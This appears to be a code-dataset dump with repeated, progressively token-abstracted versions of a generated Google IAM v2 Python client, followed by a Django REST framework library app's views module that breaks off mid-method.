This action is permanent.\n\n Args:\n request: (IamPoliciesDeleteRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Delete')\n return self._RunMethod(config, request, global_params=global_params\n )\n Delete.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='DELETE', method_id='iam.policies.delete',\n ordered_params=['name'], path_params=['name'], query_params=[\n 'etag'], relative_path='v2/{+name}', request_field='',\n request_type_name='IamPoliciesDeleteRequest',\n response_type_name='GoogleLongrunningOperation',\n supports_download=False)\n\n def Get(self, request, global_params=None):\n \"\"\"Gets a policy.\n\n Args:\n request: (IamPoliciesGetRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleIamV2Policy) The response message.\n \"\"\"\n config = self.GetMethodConfig('Get')\n return self._RunMethod(config, request, global_params=global_params\n )\n Get.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='GET', method_id='iam.policies.get', ordered_params\n =['name'], path_params=['name'], query_params=[], relative_path\n ='v2/{+name}', request_field='', request_type_name=\n 'IamPoliciesGetRequest', response_type_name='GoogleIamV2Policy',\n supports_download=False)\n\n def ListPolicies(self, request, global_params=None):\n \"\"\"Retrieves the policies of the specified kind that are attached to a resource. The response lists only policy metadata. In particular, policy rules are omitted.\n\n Args:\n request: (IamPoliciesListPoliciesRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleIamV2ListPoliciesResponse) The response message.\n \"\"\"\n config = self.GetMethodConfig('ListPolicies')\n return self._RunMethod(config, request, global_params=global_params\n )\n ListPolicies.method_config = lambda : base_api.ApiMethodInfo(flat_path\n ='v2/policies/{policiesId}/{policiesId1}', http_method='GET',\n method_id='iam.policies.listPolicies', ordered_params=['parent'\n ], path_params=['parent'], query_params=['pageSize',\n 'pageToken'], relative_path='v2/{+parent}', request_field='',\n request_type_name='IamPoliciesListPoliciesRequest',\n response_type_name='GoogleIamV2ListPoliciesResponse',\n supports_download=False)\n\n def Update(self, request, global_params=None):\n \"\"\"Updates the specified policy. You can update only the rules and the display name for the policy. To update a policy, you should use a read-modify-write loop: 1. Use GetPolicy to read the current version of the policy. 2. Modify the policy as needed. 3. Use `UpdatePolicy` to write the updated policy. 
This pattern helps prevent conflicts between concurrent updates.\n\n Args:\n request: (GoogleIamV2Policy) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Update')\n return self._RunMethod(config, request, global_params=global_params\n )\n Update.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='PUT', method_id='iam.policies.update',\n ordered_params=['name'], path_params=['name'], query_params=[],\n relative_path='v2/{+name}', request_field='<request>',\n request_type_name='GoogleIamV2Policy', response_type_name=\n 'GoogleLongrunningOperation', supports_download=False)\n",
"<docstring token>\n<import token>\n\n\nclass IamV2(base_api.BaseApiClient):\n \"\"\"Generated client library for service iam version v2.\"\"\"\n MESSAGES_MODULE = messages\n BASE_URL = 'https://iam.googleapis.com/'\n MTLS_BASE_URL = 'https://iam.mtls.googleapis.com/'\n _PACKAGE = 'iam'\n _SCOPES = ['https://www.googleapis.com/auth/cloud-platform']\n _VERSION = 'v2'\n _CLIENT_ID = 'CLIENT_ID'\n _CLIENT_SECRET = 'CLIENT_SECRET'\n _USER_AGENT = 'google-cloud-sdk'\n _CLIENT_CLASS_NAME = 'IamV2'\n _URL_VERSION = 'v2'\n _API_KEY = None\n\n def __init__(self, url='', credentials=None, get_credentials=True, http\n =None, model=None, log_request=False, log_response=False,\n credentials_args=None, default_global_params=None,\n additional_http_headers=None, response_encoding=None):\n \"\"\"Create a new iam handle.\"\"\"\n url = url or self.BASE_URL\n super(IamV2, self).__init__(url, credentials=credentials,\n get_credentials=get_credentials, http=http, model=model,\n log_request=log_request, log_response=log_response,\n credentials_args=credentials_args, default_global_params=\n default_global_params, additional_http_headers=\n additional_http_headers, response_encoding=response_encoding)\n self.policies_operations = self.PoliciesOperationsService(self)\n self.policies = self.PoliciesService(self)\n\n\n class PoliciesOperationsService(base_api.BaseApiService):\n \"\"\"Service class for the policies_operations resource.\"\"\"\n _NAME = 'policies_operations'\n\n def __init__(self, client):\n super(IamV2.PoliciesOperationsService, self).__init__(client)\n self._upload_configs = {}\n\n def Get(self, request, global_params=None):\n \"\"\"Gets the latest state of a long-running operation. Clients can use this method to poll the operation result at intervals as recommended by the API service.\n\n Args:\n request: (IamPoliciesOperationsGetRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Get')\n return self._RunMethod(config, request, global_params=global_params\n )\n Get.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}/operations/{operationsId}'\n , http_method='GET', method_id='iam.policies.operations.get',\n ordered_params=['name'], path_params=['name'], query_params=[],\n relative_path='v2/{+name}', request_field='', request_type_name\n ='IamPoliciesOperationsGetRequest', response_type_name=\n 'GoogleLongrunningOperation', supports_download=False)\n\n\n class PoliciesService(base_api.BaseApiService):\n \"\"\"Service class for the policies resource.\"\"\"\n _NAME = 'policies'\n\n def __init__(self, client):\n super(IamV2.PoliciesService, self).__init__(client)\n self._upload_configs = {}\n\n def CreatePolicy(self, request, global_params=None):\n \"\"\"Creates a policy.\n\n Args:\n request: (IamPoliciesCreatePolicyRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('CreatePolicy')\n return self._RunMethod(config, request, global_params=global_params\n )\n CreatePolicy.method_config = lambda : base_api.ApiMethodInfo(flat_path\n ='v2/policies/{policiesId}/{policiesId1}', http_method='POST',\n method_id='iam.policies.createPolicy', ordered_params=['parent'\n ], path_params=['parent'], query_params=['policyId'],\n relative_path='v2/{+parent}', 
request_field='googleIamV2Policy',\n request_type_name='IamPoliciesCreatePolicyRequest',\n response_type_name='GoogleLongrunningOperation',\n supports_download=False)\n\n def Delete(self, request, global_params=None):\n \"\"\"Deletes a policy. This action is permanent.\n\n Args:\n request: (IamPoliciesDeleteRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Delete')\n return self._RunMethod(config, request, global_params=global_params\n )\n Delete.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='DELETE', method_id='iam.policies.delete',\n ordered_params=['name'], path_params=['name'], query_params=[\n 'etag'], relative_path='v2/{+name}', request_field='',\n request_type_name='IamPoliciesDeleteRequest',\n response_type_name='GoogleLongrunningOperation',\n supports_download=False)\n\n def Get(self, request, global_params=None):\n \"\"\"Gets a policy.\n\n Args:\n request: (IamPoliciesGetRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleIamV2Policy) The response message.\n \"\"\"\n config = self.GetMethodConfig('Get')\n return self._RunMethod(config, request, global_params=global_params\n )\n Get.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='GET', method_id='iam.policies.get', ordered_params\n =['name'], path_params=['name'], query_params=[], relative_path\n ='v2/{+name}', request_field='', request_type_name=\n 'IamPoliciesGetRequest', response_type_name='GoogleIamV2Policy',\n supports_download=False)\n\n def ListPolicies(self, request, global_params=None):\n \"\"\"Retrieves the policies of the specified kind that are attached to a resource. The response lists only policy metadata. In particular, policy rules are omitted.\n\n Args:\n request: (IamPoliciesListPoliciesRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleIamV2ListPoliciesResponse) The response message.\n \"\"\"\n config = self.GetMethodConfig('ListPolicies')\n return self._RunMethod(config, request, global_params=global_params\n )\n ListPolicies.method_config = lambda : base_api.ApiMethodInfo(flat_path\n ='v2/policies/{policiesId}/{policiesId1}', http_method='GET',\n method_id='iam.policies.listPolicies', ordered_params=['parent'\n ], path_params=['parent'], query_params=['pageSize',\n 'pageToken'], relative_path='v2/{+parent}', request_field='',\n request_type_name='IamPoliciesListPoliciesRequest',\n response_type_name='GoogleIamV2ListPoliciesResponse',\n supports_download=False)\n\n def Update(self, request, global_params=None):\n \"\"\"Updates the specified policy. You can update only the rules and the display name for the policy. To update a policy, you should use a read-modify-write loop: 1. Use GetPolicy to read the current version of the policy. 2. Modify the policy as needed. 3. Use `UpdatePolicy` to write the updated policy. 
This pattern helps prevent conflicts between concurrent updates.\n\n Args:\n request: (GoogleIamV2Policy) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Update')\n return self._RunMethod(config, request, global_params=global_params\n )\n Update.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='PUT', method_id='iam.policies.update',\n ordered_params=['name'], path_params=['name'], query_params=[],\n relative_path='v2/{+name}', request_field='<request>',\n request_type_name='GoogleIamV2Policy', response_type_name=\n 'GoogleLongrunningOperation', supports_download=False)\n",
"<docstring token>\n<import token>\n\n\nclass IamV2(base_api.BaseApiClient):\n <docstring token>\n MESSAGES_MODULE = messages\n BASE_URL = 'https://iam.googleapis.com/'\n MTLS_BASE_URL = 'https://iam.mtls.googleapis.com/'\n _PACKAGE = 'iam'\n _SCOPES = ['https://www.googleapis.com/auth/cloud-platform']\n _VERSION = 'v2'\n _CLIENT_ID = 'CLIENT_ID'\n _CLIENT_SECRET = 'CLIENT_SECRET'\n _USER_AGENT = 'google-cloud-sdk'\n _CLIENT_CLASS_NAME = 'IamV2'\n _URL_VERSION = 'v2'\n _API_KEY = None\n\n def __init__(self, url='', credentials=None, get_credentials=True, http\n =None, model=None, log_request=False, log_response=False,\n credentials_args=None, default_global_params=None,\n additional_http_headers=None, response_encoding=None):\n \"\"\"Create a new iam handle.\"\"\"\n url = url or self.BASE_URL\n super(IamV2, self).__init__(url, credentials=credentials,\n get_credentials=get_credentials, http=http, model=model,\n log_request=log_request, log_response=log_response,\n credentials_args=credentials_args, default_global_params=\n default_global_params, additional_http_headers=\n additional_http_headers, response_encoding=response_encoding)\n self.policies_operations = self.PoliciesOperationsService(self)\n self.policies = self.PoliciesService(self)\n\n\n class PoliciesOperationsService(base_api.BaseApiService):\n \"\"\"Service class for the policies_operations resource.\"\"\"\n _NAME = 'policies_operations'\n\n def __init__(self, client):\n super(IamV2.PoliciesOperationsService, self).__init__(client)\n self._upload_configs = {}\n\n def Get(self, request, global_params=None):\n \"\"\"Gets the latest state of a long-running operation. Clients can use this method to poll the operation result at intervals as recommended by the API service.\n\n Args:\n request: (IamPoliciesOperationsGetRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Get')\n return self._RunMethod(config, request, global_params=global_params\n )\n Get.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}/operations/{operationsId}'\n , http_method='GET', method_id='iam.policies.operations.get',\n ordered_params=['name'], path_params=['name'], query_params=[],\n relative_path='v2/{+name}', request_field='', request_type_name\n ='IamPoliciesOperationsGetRequest', response_type_name=\n 'GoogleLongrunningOperation', supports_download=False)\n\n\n class PoliciesService(base_api.BaseApiService):\n \"\"\"Service class for the policies resource.\"\"\"\n _NAME = 'policies'\n\n def __init__(self, client):\n super(IamV2.PoliciesService, self).__init__(client)\n self._upload_configs = {}\n\n def CreatePolicy(self, request, global_params=None):\n \"\"\"Creates a policy.\n\n Args:\n request: (IamPoliciesCreatePolicyRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('CreatePolicy')\n return self._RunMethod(config, request, global_params=global_params\n )\n CreatePolicy.method_config = lambda : base_api.ApiMethodInfo(flat_path\n ='v2/policies/{policiesId}/{policiesId1}', http_method='POST',\n method_id='iam.policies.createPolicy', ordered_params=['parent'\n ], path_params=['parent'], query_params=['policyId'],\n relative_path='v2/{+parent}', request_field='googleIamV2Policy',\n 
request_type_name='IamPoliciesCreatePolicyRequest',\n response_type_name='GoogleLongrunningOperation',\n supports_download=False)\n\n def Delete(self, request, global_params=None):\n \"\"\"Deletes a policy. This action is permanent.\n\n Args:\n request: (IamPoliciesDeleteRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Delete')\n return self._RunMethod(config, request, global_params=global_params\n )\n Delete.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='DELETE', method_id='iam.policies.delete',\n ordered_params=['name'], path_params=['name'], query_params=[\n 'etag'], relative_path='v2/{+name}', request_field='',\n request_type_name='IamPoliciesDeleteRequest',\n response_type_name='GoogleLongrunningOperation',\n supports_download=False)\n\n def Get(self, request, global_params=None):\n \"\"\"Gets a policy.\n\n Args:\n request: (IamPoliciesGetRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleIamV2Policy) The response message.\n \"\"\"\n config = self.GetMethodConfig('Get')\n return self._RunMethod(config, request, global_params=global_params\n )\n Get.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='GET', method_id='iam.policies.get', ordered_params\n =['name'], path_params=['name'], query_params=[], relative_path\n ='v2/{+name}', request_field='', request_type_name=\n 'IamPoliciesGetRequest', response_type_name='GoogleIamV2Policy',\n supports_download=False)\n\n def ListPolicies(self, request, global_params=None):\n \"\"\"Retrieves the policies of the specified kind that are attached to a resource. The response lists only policy metadata. In particular, policy rules are omitted.\n\n Args:\n request: (IamPoliciesListPoliciesRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleIamV2ListPoliciesResponse) The response message.\n \"\"\"\n config = self.GetMethodConfig('ListPolicies')\n return self._RunMethod(config, request, global_params=global_params\n )\n ListPolicies.method_config = lambda : base_api.ApiMethodInfo(flat_path\n ='v2/policies/{policiesId}/{policiesId1}', http_method='GET',\n method_id='iam.policies.listPolicies', ordered_params=['parent'\n ], path_params=['parent'], query_params=['pageSize',\n 'pageToken'], relative_path='v2/{+parent}', request_field='',\n request_type_name='IamPoliciesListPoliciesRequest',\n response_type_name='GoogleIamV2ListPoliciesResponse',\n supports_download=False)\n\n def Update(self, request, global_params=None):\n \"\"\"Updates the specified policy. You can update only the rules and the display name for the policy. To update a policy, you should use a read-modify-write loop: 1. Use GetPolicy to read the current version of the policy. 2. Modify the policy as needed. 3. Use `UpdatePolicy` to write the updated policy. 
This pattern helps prevent conflicts between concurrent updates.\n\n Args:\n request: (GoogleIamV2Policy) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Update')\n return self._RunMethod(config, request, global_params=global_params\n )\n Update.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='PUT', method_id='iam.policies.update',\n ordered_params=['name'], path_params=['name'], query_params=[],\n relative_path='v2/{+name}', request_field='<request>',\n request_type_name='GoogleIamV2Policy', response_type_name=\n 'GoogleLongrunningOperation', supports_download=False)\n",
"<docstring token>\n<import token>\n\n\nclass IamV2(base_api.BaseApiClient):\n <docstring token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n def __init__(self, url='', credentials=None, get_credentials=True, http\n =None, model=None, log_request=False, log_response=False,\n credentials_args=None, default_global_params=None,\n additional_http_headers=None, response_encoding=None):\n \"\"\"Create a new iam handle.\"\"\"\n url = url or self.BASE_URL\n super(IamV2, self).__init__(url, credentials=credentials,\n get_credentials=get_credentials, http=http, model=model,\n log_request=log_request, log_response=log_response,\n credentials_args=credentials_args, default_global_params=\n default_global_params, additional_http_headers=\n additional_http_headers, response_encoding=response_encoding)\n self.policies_operations = self.PoliciesOperationsService(self)\n self.policies = self.PoliciesService(self)\n\n\n class PoliciesOperationsService(base_api.BaseApiService):\n \"\"\"Service class for the policies_operations resource.\"\"\"\n _NAME = 'policies_operations'\n\n def __init__(self, client):\n super(IamV2.PoliciesOperationsService, self).__init__(client)\n self._upload_configs = {}\n\n def Get(self, request, global_params=None):\n \"\"\"Gets the latest state of a long-running operation. Clients can use this method to poll the operation result at intervals as recommended by the API service.\n\n Args:\n request: (IamPoliciesOperationsGetRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Get')\n return self._RunMethod(config, request, global_params=global_params\n )\n Get.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}/operations/{operationsId}'\n , http_method='GET', method_id='iam.policies.operations.get',\n ordered_params=['name'], path_params=['name'], query_params=[],\n relative_path='v2/{+name}', request_field='', request_type_name\n ='IamPoliciesOperationsGetRequest', response_type_name=\n 'GoogleLongrunningOperation', supports_download=False)\n\n\n class PoliciesService(base_api.BaseApiService):\n \"\"\"Service class for the policies resource.\"\"\"\n _NAME = 'policies'\n\n def __init__(self, client):\n super(IamV2.PoliciesService, self).__init__(client)\n self._upload_configs = {}\n\n def CreatePolicy(self, request, global_params=None):\n \"\"\"Creates a policy.\n\n Args:\n request: (IamPoliciesCreatePolicyRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('CreatePolicy')\n return self._RunMethod(config, request, global_params=global_params\n )\n CreatePolicy.method_config = lambda : base_api.ApiMethodInfo(flat_path\n ='v2/policies/{policiesId}/{policiesId1}', http_method='POST',\n method_id='iam.policies.createPolicy', ordered_params=['parent'\n ], path_params=['parent'], query_params=['policyId'],\n relative_path='v2/{+parent}', request_field='googleIamV2Policy',\n request_type_name='IamPoliciesCreatePolicyRequest',\n response_type_name='GoogleLongrunningOperation',\n supports_download=False)\n\n def Delete(self, 
request, global_params=None):\n \"\"\"Deletes a policy. This action is permanent.\n\n Args:\n request: (IamPoliciesDeleteRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Delete')\n return self._RunMethod(config, request, global_params=global_params\n )\n Delete.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='DELETE', method_id='iam.policies.delete',\n ordered_params=['name'], path_params=['name'], query_params=[\n 'etag'], relative_path='v2/{+name}', request_field='',\n request_type_name='IamPoliciesDeleteRequest',\n response_type_name='GoogleLongrunningOperation',\n supports_download=False)\n\n def Get(self, request, global_params=None):\n \"\"\"Gets a policy.\n\n Args:\n request: (IamPoliciesGetRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleIamV2Policy) The response message.\n \"\"\"\n config = self.GetMethodConfig('Get')\n return self._RunMethod(config, request, global_params=global_params\n )\n Get.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='GET', method_id='iam.policies.get', ordered_params\n =['name'], path_params=['name'], query_params=[], relative_path\n ='v2/{+name}', request_field='', request_type_name=\n 'IamPoliciesGetRequest', response_type_name='GoogleIamV2Policy',\n supports_download=False)\n\n def ListPolicies(self, request, global_params=None):\n \"\"\"Retrieves the policies of the specified kind that are attached to a resource. The response lists only policy metadata. In particular, policy rules are omitted.\n\n Args:\n request: (IamPoliciesListPoliciesRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleIamV2ListPoliciesResponse) The response message.\n \"\"\"\n config = self.GetMethodConfig('ListPolicies')\n return self._RunMethod(config, request, global_params=global_params\n )\n ListPolicies.method_config = lambda : base_api.ApiMethodInfo(flat_path\n ='v2/policies/{policiesId}/{policiesId1}', http_method='GET',\n method_id='iam.policies.listPolicies', ordered_params=['parent'\n ], path_params=['parent'], query_params=['pageSize',\n 'pageToken'], relative_path='v2/{+parent}', request_field='',\n request_type_name='IamPoliciesListPoliciesRequest',\n response_type_name='GoogleIamV2ListPoliciesResponse',\n supports_download=False)\n\n def Update(self, request, global_params=None):\n \"\"\"Updates the specified policy. You can update only the rules and the display name for the policy. To update a policy, you should use a read-modify-write loop: 1. Use GetPolicy to read the current version of the policy. 2. Modify the policy as needed. 3. Use `UpdatePolicy` to write the updated policy. 
This pattern helps prevent conflicts between concurrent updates.\n\n Args:\n request: (GoogleIamV2Policy) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Update')\n return self._RunMethod(config, request, global_params=global_params\n )\n Update.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='PUT', method_id='iam.policies.update',\n ordered_params=['name'], path_params=['name'], query_params=[],\n relative_path='v2/{+name}', request_field='<request>',\n request_type_name='GoogleIamV2Policy', response_type_name=\n 'GoogleLongrunningOperation', supports_download=False)\n",
"<docstring token>\n<import token>\n\n\nclass IamV2(base_api.BaseApiClient):\n <docstring token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n\n\n class PoliciesOperationsService(base_api.BaseApiService):\n \"\"\"Service class for the policies_operations resource.\"\"\"\n _NAME = 'policies_operations'\n\n def __init__(self, client):\n super(IamV2.PoliciesOperationsService, self).__init__(client)\n self._upload_configs = {}\n\n def Get(self, request, global_params=None):\n \"\"\"Gets the latest state of a long-running operation. Clients can use this method to poll the operation result at intervals as recommended by the API service.\n\n Args:\n request: (IamPoliciesOperationsGetRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Get')\n return self._RunMethod(config, request, global_params=global_params\n )\n Get.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}/operations/{operationsId}'\n , http_method='GET', method_id='iam.policies.operations.get',\n ordered_params=['name'], path_params=['name'], query_params=[],\n relative_path='v2/{+name}', request_field='', request_type_name\n ='IamPoliciesOperationsGetRequest', response_type_name=\n 'GoogleLongrunningOperation', supports_download=False)\n\n\n class PoliciesService(base_api.BaseApiService):\n \"\"\"Service class for the policies resource.\"\"\"\n _NAME = 'policies'\n\n def __init__(self, client):\n super(IamV2.PoliciesService, self).__init__(client)\n self._upload_configs = {}\n\n def CreatePolicy(self, request, global_params=None):\n \"\"\"Creates a policy.\n\n Args:\n request: (IamPoliciesCreatePolicyRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('CreatePolicy')\n return self._RunMethod(config, request, global_params=global_params\n )\n CreatePolicy.method_config = lambda : base_api.ApiMethodInfo(flat_path\n ='v2/policies/{policiesId}/{policiesId1}', http_method='POST',\n method_id='iam.policies.createPolicy', ordered_params=['parent'\n ], path_params=['parent'], query_params=['policyId'],\n relative_path='v2/{+parent}', request_field='googleIamV2Policy',\n request_type_name='IamPoliciesCreatePolicyRequest',\n response_type_name='GoogleLongrunningOperation',\n supports_download=False)\n\n def Delete(self, request, global_params=None):\n \"\"\"Deletes a policy. 
This action is permanent.\n\n Args:\n request: (IamPoliciesDeleteRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Delete')\n return self._RunMethod(config, request, global_params=global_params\n )\n Delete.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='DELETE', method_id='iam.policies.delete',\n ordered_params=['name'], path_params=['name'], query_params=[\n 'etag'], relative_path='v2/{+name}', request_field='',\n request_type_name='IamPoliciesDeleteRequest',\n response_type_name='GoogleLongrunningOperation',\n supports_download=False)\n\n def Get(self, request, global_params=None):\n \"\"\"Gets a policy.\n\n Args:\n request: (IamPoliciesGetRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleIamV2Policy) The response message.\n \"\"\"\n config = self.GetMethodConfig('Get')\n return self._RunMethod(config, request, global_params=global_params\n )\n Get.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='GET', method_id='iam.policies.get', ordered_params\n =['name'], path_params=['name'], query_params=[], relative_path\n ='v2/{+name}', request_field='', request_type_name=\n 'IamPoliciesGetRequest', response_type_name='GoogleIamV2Policy',\n supports_download=False)\n\n def ListPolicies(self, request, global_params=None):\n \"\"\"Retrieves the policies of the specified kind that are attached to a resource. The response lists only policy metadata. In particular, policy rules are omitted.\n\n Args:\n request: (IamPoliciesListPoliciesRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleIamV2ListPoliciesResponse) The response message.\n \"\"\"\n config = self.GetMethodConfig('ListPolicies')\n return self._RunMethod(config, request, global_params=global_params\n )\n ListPolicies.method_config = lambda : base_api.ApiMethodInfo(flat_path\n ='v2/policies/{policiesId}/{policiesId1}', http_method='GET',\n method_id='iam.policies.listPolicies', ordered_params=['parent'\n ], path_params=['parent'], query_params=['pageSize',\n 'pageToken'], relative_path='v2/{+parent}', request_field='',\n request_type_name='IamPoliciesListPoliciesRequest',\n response_type_name='GoogleIamV2ListPoliciesResponse',\n supports_download=False)\n\n def Update(self, request, global_params=None):\n \"\"\"Updates the specified policy. You can update only the rules and the display name for the policy. To update a policy, you should use a read-modify-write loop: 1. Use GetPolicy to read the current version of the policy. 2. Modify the policy as needed. 3. Use `UpdatePolicy` to write the updated policy. 
This pattern helps prevent conflicts between concurrent updates.\n\n Args:\n request: (GoogleIamV2Policy) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Update')\n return self._RunMethod(config, request, global_params=global_params\n )\n Update.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='PUT', method_id='iam.policies.update',\n ordered_params=['name'], path_params=['name'], query_params=[],\n relative_path='v2/{+name}', request_field='<request>',\n request_type_name='GoogleIamV2Policy', response_type_name=\n 'GoogleLongrunningOperation', supports_download=False)\n",
"<docstring token>\n<import token>\n<class token>\n"
] | false |
99,825 | 089ac07b11afaa81f4675f2dfca9fa9a3125c555 | from datetime import datetime, timedelta
from django.shortcuts import render
from rest_framework import viewsets, status
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.authtoken.models import Token
from rest_framework.response import Response
from rest_framework.authentication import TokenAuthentication
from rest_framework.permissions import IsAdminUser
from .models import Book, Borrower, IssueSlip
from .permissions import (
ReadBookPermission,
ReadUpdateStudentPermission,
ReadUpdateTeacherPermission
)
from .serializers import (
BookSerializer,
BookDetailSerializer,
BorrowerSerializer,
BorrowerDetailSerializer,
IssueSlipSerializer
)
# def ObjectInactive(self, request, pk):
# object = self.get_object()
# object.is_active = False
# object.save()
# return Response("{'message':'Deleted'}",status=status.HTTP_200_OK)
class HomePage:
def index(request):
return render(request, 'index.html')
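# Token login endpoint: on valid credentials it returns the DRF token plus the user's id and email.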
class CustomAuthToken(ObtainAuthToken):
def post(self, request, *args, **kwargs):
serializer = self.serializer_class(data=request.data,
context={'request': request})
serializer.is_valid(raise_exception=True)
user = serializer.validated_data['user']
token, created = Token.objects.get_or_create(user=user)
return Response({
'token': token.key,
'user_id': user.pk,
'email': user.email
})
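# Book catalogue endpoint; destroy() soft-deletes by flagging the record inactive and unavailable.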
class BookViewSet(viewsets.ModelViewSet):
authentication_classes = (TokenAuthentication,)
permission_classes = (ReadBookPermission,)
queryset = Book.objects.all()
def get_serializer_class(self):
if hasattr(self, 'action') and self.action == 'list':
return BookSerializer
elif hasattr(self, 'action') and self.action == 'retrieve':
return BookDetailSerializer
return BookDetailSerializer
def destroy(self, request, pk):
book = self.get_object()
book.is_active = False
book.is_available = False
book.save()
return Response("{'message':'Deleted'}",status=status.HTTP_200_OK)
class StudentViewSet(viewsets.ModelViewSet):
queryset = Borrower.objects.filter(borrower_type__iexact='S')
authentication_classes = (TokenAuthentication,)
permission_classes = (ReadUpdateStudentPermission,)
def get_serializer_class(self):
if hasattr(self, 'action') and self.action == 'list':
return BorrowerSerializer
elif hasattr(self, 'action') and self.action == 'retrieve':
return BorrowerDetailSerializer
return BorrowerDetailSerializer
def destroy(self, request, pk):
student = self.get_object()
student.is_active = False
student.save()
